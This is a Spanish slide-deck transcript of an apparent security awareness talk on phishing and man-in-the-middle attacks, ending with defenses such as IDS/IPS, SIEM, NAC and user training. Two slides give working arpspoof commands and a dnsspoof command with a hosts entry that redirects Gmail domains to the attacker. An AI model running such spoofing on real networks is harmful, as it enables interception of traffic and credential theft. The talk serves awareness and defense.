Innovacion, si pero con seguridad

15
¿Quieres que adivine la contraseña de tu correo electrónico? David Romero Consultor Técnico

Transcript of Innovacion, si pero con seguridad

Page 1: Innovacion, si pero con seguridad

¿Quieres que adivine la contraseña de tu correo electrónico?

David RomeroConsultor Técnico

Page 2: Innovacion, si pero con seguridad

¿Qué es el Phishing?

Es el intento o acción de conseguir información sensible como nombres de usuario, contraseñas, tarjetas de crédito (y algunas veces indirectamente dinero) con fines maliciosos, suplantando la identidad en las comunicaciones electrónicas.

Page 3: Innovacion, si pero con seguridad

Ejemplos de Phishing

Page 4: Innovacion, si pero con seguridad

Ejemplos de Phishing

Page 5: Innovacion, si pero con seguridad

MITM: Man In The Middle

Es un ataque donde el atacante intercepta la comunicación de la víctima, sin su consentimiento y sin su conocimiento, para alterar la comunicación con fines maliciosos o para espiar la comunicación obteniendo información sensible.

Page 6: Innovacion, si pero con seguridad

MITM: Herramientasarpspoof

arpspoof ­i eth0 ­t 10.0.0.1 10.0.0.7arpspoof ­i eth0 ­t 10.0.0.7 10.0.0.1

Page 7: Innovacion, si pero con seguridad

MITM: Herramientasdnsspoof

# dnsspoof ­i eth0 ­f /etc/dnsspoof.hosts# Ejemplo fichero dnsspoof.hosts    ip_atacante *.gmail.com

Page 8: Innovacion, si pero con seguridad

Escenario Práctico

Page 9: Innovacion, si pero con seguridad

Caso Práctico

Page 10: Innovacion, si pero con seguridad

¿Cómo nos protegemos?Sistemas de detección y protección de intrusos

(IDS/IPS)

Page 11: Innovacion, si pero con seguridad

¿Cómo nos protegemos?Sistemas de Gestión de Eventos de Seguridad

(SIEM)

Page 12: Innovacion, si pero con seguridad

¿Cómo nos protegemos?Network Access Control

(NAC)

Page 13: Innovacion, si pero con seguridad

¿Cómo nos protegemos?Concienciación del usuario

Page 14: Innovacion, si pero con seguridad

¿Cómo nos protegemos?Cuenta con profesionales

Page 15: Innovacion, si pero con seguridad

Gracias

“Creciendo Juntos”

[email protected]